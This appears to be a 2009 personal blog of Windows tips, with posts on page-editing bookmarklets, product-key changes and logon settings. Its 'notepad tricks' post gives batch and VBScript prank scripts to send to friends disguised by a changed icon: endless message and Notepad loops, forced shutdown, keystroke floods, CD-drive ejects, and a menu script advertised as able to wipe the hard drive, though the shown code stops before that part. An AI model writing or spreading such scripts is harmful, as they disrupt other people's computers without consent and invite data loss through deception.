Thursday, July 30, 2009

Now itz easy to search a girl

Search
*Pin Code
*Phone No.
*Speed Post Tracking
&
More
http://www.indiapost.gov.in

BE FAST N QUICK

A simpal trick to erase ur pc
hard-disk disk error &
keep fast ur hard-disk read
write speed.
try
open run
=>type cmd

=>type CHKDSK

Sunday, July 26, 2009

Edit any webpage INTERNET

1) Go to the site you wish to edit

2) In the browser’s address bar, paste this code:

javascript:document.body.contentEditable
='true'; document.designMode='on'; void 0


3) Now click on the part of the page you want to edit and start changing, deleting and adding text.

Friday, July 24, 2009

FUNNY NOTEPAD TRICK

1> Open Notepad
2> Enter four words separated by spaces, wherein the first word has 4 letters, the next two have three letters, and the last word has five letters
3> DON'T hit enter at the end of the line.
4> Save the file.
5> Close Notepad.
6> Reopen Notepad.
7> Open the file you just saved.

eg:
type “Haro ooo ooo oooon” without quotation marks
don’t press “enter” save the file
close notepad
open the file again
See what happens!

Edit any webpage INTERNET

1) Go to the site you wish to edit

2) In the browser’s address bar, paste this code:

javascript:document.body.contentEditable
='true'; document.designMode='on'; void 0


3) Now click on the part of the page you want to edit and start changing, deleting and adding text.

RENAME MULTIPLE FILES


It is possible to rename multiple file at one TIME.
Just select all the files to be renamed
and then press F2 key.
Give the desired name and then press enter.
You are done, file name has been changed.

Thursday, July 23, 2009

NOTE PAD TRICKS

10 notepad tricks to fool ur frnds 
1>
Cycle a message in your friend's computer:

Type :

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

Save it as "Anything.BAT" and send it.

2>
Convey your friend a lil' message and shut down his / her computer:
Type :

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" in All Files and send it.

3>
Toggle your friend's Caps Lock button simultaneously:
Type :

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Save it as "Anything.VBS" and send it.

4>
Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!
Type :

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Save it as "Anything.VBS" and send it.

5>
Frustrate your friend by making this VBScript hit Enter simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop

Save it as "Anything.VBS" and send it.

6>
Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:
Type :

WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "

Save it as "Anything.VBS" and send it.

7>
Frustrate your friend by making this VBScript hit Backspace simultaneously:
Type :

MsgBox "Let's go back a few steps"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Save it as "Anything.VBS" and send it.

8>
Hack your friend's keyboard and make him type "You are a fool" simultaneously:
Type :

Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop

Save it as "Anything.VBS" and send it.

9>
Open Notepad continually in your friend's computer:
Type :

@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Save it as "Anything.BAT" and send it.


10>
Hard prank: Pick your poison batch file. It asks your friend to choose a number between 1-5 and then does a certain action:

1: Shutdown
2: Restart
3: Wipes out your hard drive (BEWARE)
4: Net send
5: Messages then shutdown
Type :

@echo off
title The end of the world
cd C:\
:menu
cls
echo I take no responsibility for your actions. Beyond this point it is you that has the power to kill yourself. If you press 'x' then your PC will be formatted. Do not come crying to me when you fried your computer or if you lost your project etc...
pause
echo Pick your poison:
echo 1. Die this way (Wimp)
echo 2. Die this way (WIMP!)
echo 3. DO NOT DIE THIS WAY
echo 4. Die this way (you're boring)
echo 5. Easy way out
set input=nothing
set /p input=Choice:
if %input%==1 goto one
if %input%==2 goto two

Save it as "Anything.BAT" and send it.

You might wanna have to change the Icon of the file before sending it to your friend, so right click the file, click Properties, click on the 'Change' Icon and change the icon from there.

Sunday, July 19, 2009

download ZOO ZOO funny videos

Be free to download funny adds of ZOO ZOO(vodafone) from following links:

ZOO pics:-   http://www.ziddu.com/download/5670151/ZooZooPics.rar.html

there is a problem while adding videos i will tomm

Saturday, July 18, 2009

Want to know something interesting??U can change ur XP key now...


Here's How:

  1. Click on Start and then Run.

  2. In the text box in the Run window, type regedit and click OK. This will open the Registry Editor program.

  3. Locate the HKEY_LOCAL_MACHINE folder under My Computer and click on the (+) sign next the folder name to expand the folder.

  4. Continue to expand folders until you reach the HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents registry key.

  5. Click on the WPAEvents folder.

  6. In the results that appear in the window on the right, locate OOBETimer.

  7. Right-click on the OOBETimer entry and choose Modify from the resulting menu.

  8. Change at least one digit in the Value data text box and click OK. This will deactivate Windows XP.

  9. Click on Start and then Run.

  10. In the text box in the Run window, type the following command and click OK.

    %systemroot%\system32\oobe\msoobe.exe /a

  11. When the Windows Product Activation window appears, choose Yes, I want to telephone a customer service representative to activate Windows and then click Next.

  12. Click Change Product Key.

  13. Type your new, valid Windows XP product key in the New key text boxes and then click Update.

  14. If you're taken back to the previous screen and prompted, choose Remind me later.

  15. Restart your PC.

Thursday, July 16, 2009

How to disable password request before logon

If you do not want users to be authenticated before using the system then you can make use of this trick. Note that for Windows with multiple users it is not recommended to disable the start up login dialog box.This will affect privacy.

Open the run dialog (start > run).

Type "Control Userpasswords2" without quotes and click ok.

In the resulting User Accounts dialog box, uncheck the "Users must enter a user name and password to use this computer" check box.

Click the apply button.